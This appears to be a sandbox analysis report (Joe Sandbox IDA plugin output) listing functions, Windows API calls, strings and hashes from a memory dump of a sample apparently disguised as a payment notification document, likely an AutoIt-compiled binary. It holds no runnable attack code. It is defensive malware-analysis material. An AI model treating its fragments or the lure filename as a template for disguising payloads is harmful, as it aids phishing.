Opcode ID: 4455b87b1c8824c85a34478fbef71abc7bd37bfb12724d4ef6f19c76a99637d6
Instruction ID: 665ea29430687937b38abb1b22c6e562c8d3e7294c4a79900f0b1998ac4215c3
Opcode Fuzzy Hash: 4455b87b1c8824c85a34478fbef71abc7bd37bfb12724d4ef6f19c76a99637d6
Instruction Fuzzy Hash: 5021D471A00214BBCF04AFA4CC85EEEBBB8EF06310F104559F9A5A72A1DB755989DB60

Function 00973A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00973A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00973AA0
GetWindowLongW.USER32(?,000000F0), ref: 00973AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00973AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00973B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00973BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00973BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00973BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00973BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00973C13

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
Instruction ID: da4121b6eb043b2d8913baec635d32ed4a9e6ae32e6895d1b8f29f763565f32b
Opcode Fuzzy Hash: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
Instruction Fuzzy Hash: 32619D72900248AFDB11DFA8CD81EEE77B8EF49710F148159FA19A7291C770AE41EB50

Function 0094B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0094B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B165
GetWindowThreadProcessId.USER32(00000000), ref: 0094B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0094B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B21D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
Instruction ID: 0cf3dbd4bf576384e707974bc5eb6fed9eae98ce8a4ad620338def36857801da
Opcode Fuzzy Hash: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
Instruction Fuzzy Hash: 1B31CCB2568208BFDB20EF24DD98F6D7BADBF65721F108109FA14D6190D7B4DA809F60

Function 00912C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00912C94

Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0

_free.LIBCMT ref: 00912CA0
_free.LIBCMT ref: 00912CAB
_free.LIBCMT ref: 00912CB6
_free.LIBCMT ref: 00912CC1
_free.LIBCMT ref: 00912CCC
_free.LIBCMT ref: 00912CD7
_free.LIBCMT ref: 00912CE2
_free.LIBCMT ref: 00912CED
_free.LIBCMT ref: 00912CFB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
Instruction ID: e14753dac2e16fa8455a3e11404f128b18a19feb055b27da55dcb0e7ef416de1
Opcode Fuzzy Hash: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
Instruction Fuzzy Hash: 5611667660010CAFCB02FF58D942DDD3BA9FF45360F5145A5FA585F222D631EAA09B90

Function 008E1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008E1459
OleUninitialize.OLE32(?,00000000), ref: 008E14F8
UnregisterHotKey.USER32(?), ref: 008E16DD
DestroyWindow.USER32(?), ref: 009224B9
FreeLibrary.KERNEL32(?), ref: 0092251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0092254B

Strings

close all, xrefs: 008E1454

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 8ff6d5c05bacf434e399564ae016a3842d8cac019e21e7ec2c85fe8b1e2168e1
Instruction ID: 02013cef18a40acc03f4c57eaff4ee451065160091027f607a79571a06703b10
Opcode Fuzzy Hash: 8ff6d5c05bacf434e399564ae016a3842d8cac019e21e7ec2c85fe8b1e2168e1
Instruction Fuzzy Hash: 50D1A071701262DFCB29EF15D899A29F7A4FF06700F1481ADE54AAB266CB30ED12CF51

Function 00957DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00957FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00957FC1
GetFileAttributesW.KERNEL32(?), ref: 00957FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00958005
SetCurrentDirectoryW.KERNEL32(?), ref: 00958017
SetCurrentDirectoryW.KERNEL32(?), ref: 00958060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009580B0

Strings

*.*, xrefs: 00958066

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
Instruction ID: e3fd8b3d53bcd208d009c212489cd07463d19cc7ba447c093632459f92bf3a8b
Opcode Fuzzy Hash: 5f9e51579b7011daa0144bf2ca7e5f7d32ef6d1450631e076e5d526e3ea6a438
Instruction Fuzzy Hash: E28190725083419BCB20DF56D845AAAF3E8BB85311F144C5EFC85D7260EB34DE4D8B52

Function 008E5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 008E5C7A

Part of subcall function 008E5D0A: GetClientRect.USER32(?,?), ref: 008E5D30
Part of subcall function 008E5D0A: GetWindowRect.USER32(?,?), ref: 008E5D71
Part of subcall function 008E5D0A: ScreenToClient.USER32(?,?), ref: 008E5D99

GetDC.USER32 ref: 009246F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00924708
SelectObject.GDI32(00000000,00000000), ref: 00924716
SelectObject.GDI32(00000000,00000000), ref: 0092472B
ReleaseDC.USER32(?,00000000), ref: 00924733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009247C4

Strings

U, xrefs: 00924693

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
Instruction ID: f459a7a427666343664f9d688d80406d02b1a59f98d127a5e1753c2340b8962d
Opcode Fuzzy Hash: f51f909c8f09330df5a2cac293bb091420e497a11219332a66263f038d0f67a8
Instruction Fuzzy Hash: C6710431500249DFCF21CF64E984AFA3BB9FF4A324F244269ED659A1AAC7319C81DF50

Function 0095359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009535E4

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

LoadStringW.USER32(009B2390,?,00000FFF,?), ref: 0095360A

Strings

Line %d (File "%s"):, xrefs: 0095366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00953724
^ ERROR, xrefs: 009536C9
"%s" (%d) : ==> %s:, xrefs: 00953742
Error: , xrefs: 009536EF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: a52e9df5c2f92e6a625220eacc2b47603e1e36c7c3b204c8070ee5a1df49b4bd
Instruction ID: d9dd0f9dc69d9fe614366c1bad60d1bb7750b34158ba56aa9acb4e9c4654fadc
Opcode Fuzzy Hash: a52e9df5c2f92e6a625220eacc2b47603e1e36c7c3b204c8070ee5a1df49b4bd
Instruction Fuzzy Hash: 4E519C72C00249BADF15EBA5DC42EEEBB78FF45340F544125F505B21A1EB302B98DBA1

Function 0095C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0095C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0095C2CA
GetLastError.KERNEL32 ref: 0095C322
SetEvent.KERNEL32(?), ref: 0095C336
InternetCloseHandle.WININET(00000000), ref: 0095C341

Strings

, xrefs: 0095C2BB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
Instruction ID: 4293d18563b53860700ae48e82032d2879504f4939a338aae23fe367051d770d
Opcode Fuzzy Hash: 9929ec955dc7c1e2f09ae58503a9ea287d9d8cffafa044ba1b857317ae903174
Instruction Fuzzy Hash: 9B316DF2504308AFD721DF668C89AAB7AFCEB49745F10851DF84A92211DB34DD489B60

Function 0094989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00923AAF,?,?,Bad directive syntax error,0097CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009498BC
LoadStringW.USER32(00000000,?,00923AAF,?), ref: 009498C3

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00949987

Strings

Line %d (File "%s"):, xrefs: 0094992D
%s (%d) : ==> %s.: %s %s, xrefs: 009498F1
., xrefs: 0094996D
Line %d:, xrefs: 00949912
Error: , xrefs: 00949955

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 15559d1e8cac705c87302d28aadddfac46a022ba58ff928457eef56ebf11ff8d
Instruction ID: 59195ba2c020c15fb384158f5693e5e2e07427437e3bef362e34760ef28e4804
Opcode Fuzzy Hash: 15559d1e8cac705c87302d28aadddfac46a022ba58ff928457eef56ebf11ff8d
Instruction Fuzzy Hash: DE21A332C0025EBBCF15AF94CC0AEEE7779FF19304F044829F515A60A2EB719A58DB61

Function 0094209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009420AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009420C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0094214D

Strings

smallicons, xrefs: 00942115
largeicons, xrefs: 009420E1
list, xrefs: 0094212F
SHELLDLL_DefView, xrefs: 009420CC
details, xrefs: 009420FB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
Instruction ID: 98fbf9e1045b1022db972303336458c94e90937eaa2e856b8f3de4a620b66834
Opcode Fuzzy Hash: 55807f161e4b3857dc066d775dbc16299325eefd711ea96f732f51d5329c603d
Instruction Fuzzy Hash: F8110AB678C707B9F6152324DC06DE6379CEB4A729B61001AF704A50D1EA6558415664

Function 00918D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
Instruction ID: 17826d97d57f9a2a409723b572868fd289e4cfc2c62325ecba2a569268ee59c6
Opcode Fuzzy Hash: ff57f9292d9589a09b6de3dd47579e3cbfc6070f7d1f81eb07d5346bbf07e83f
Instruction Fuzzy Hash: BFC1E274F0424DAFDB21EFA8D851BEEBBB4AF4D310F184199E415A7392C7349982DB60

Function 0091CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0091CEB7
_free.LIBCMT ref: 0091CF22
_free.LIBCMT ref: 0091CF48
_free.LIBCMT ref: 0091CF71
_free.LIBCMT ref: 0091CFA9
_free.LIBCMT ref: 0091CFDA
_free.LIBCMT ref: 0091D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0091D09C
_free.LIBCMT ref: 0091D0B5

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
Instruction ID: b10a61167c78928759c3c90e78c1cb754dd7cdf11b36f0edd9d2007a50960797
Opcode Fuzzy Hash: d2ed3dcf4f366248398513a9011a7578291eb49917ecf0d368f111f3636affb3
Instruction Fuzzy Hash: D86138B1B4430CAFDB21AFB49941BEA7BA9AF85320F04416DF941973C1D6319D82D750

Function 009750D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00975186
ShowWindow.USER32(?,00000000), ref: 009751C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 009751CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009751D1

Part of subcall function 00976FBA: DeleteObject.GDI32(00000000), ref: 00976FE6

GetWindowLongW.USER32(?,000000F0), ref: 0097520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0097521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0097524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00975287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00975296

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
Instruction ID: 1c1a24fba45bb68cc614f4c831a1d6aef6f4f3d3a593ee36e7cbf6ea0ad764b9
Opcode Fuzzy Hash: 566d7f377b0f0dc96bfdcb2b8cf132bbcc80a855f451e1fa57b00a6dc745bdaa
Instruction Fuzzy Hash: 8051C272A58A08BEEF609F24CC46B983B69FB05322F55C005F62C962E1C7B5E980DB41

Function 008F8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00936890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009368A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009368B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009368D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009368F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00936901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0093692D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
Instruction ID: 9c4f5e64df5b05725436444845131057af769675a71874d03199d90dee5110ef
Opcode Fuzzy Hash: acf5736da2389594d6a98434d75a13cbc9c01d584da1c3086251c159a4f02d93
Instruction Fuzzy Hash: 195168B1610209EFDB24CF25CC95BAA7BB5FB48760F104518FA56D72A0DB70E990DB50

Function 0095C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0095C182
GetLastError.KERNEL32 ref: 0095C195
SetEvent.KERNEL32(?), ref: 0095C1A9

Part of subcall function 0095C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0095C272
Part of subcall function 0095C253: GetLastError.KERNEL32 ref: 0095C322
Part of subcall function 0095C253: SetEvent.KERNEL32(?), ref: 0095C336
Part of subcall function 0095C253: InternetCloseHandle.WININET(00000000), ref: 0095C341

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

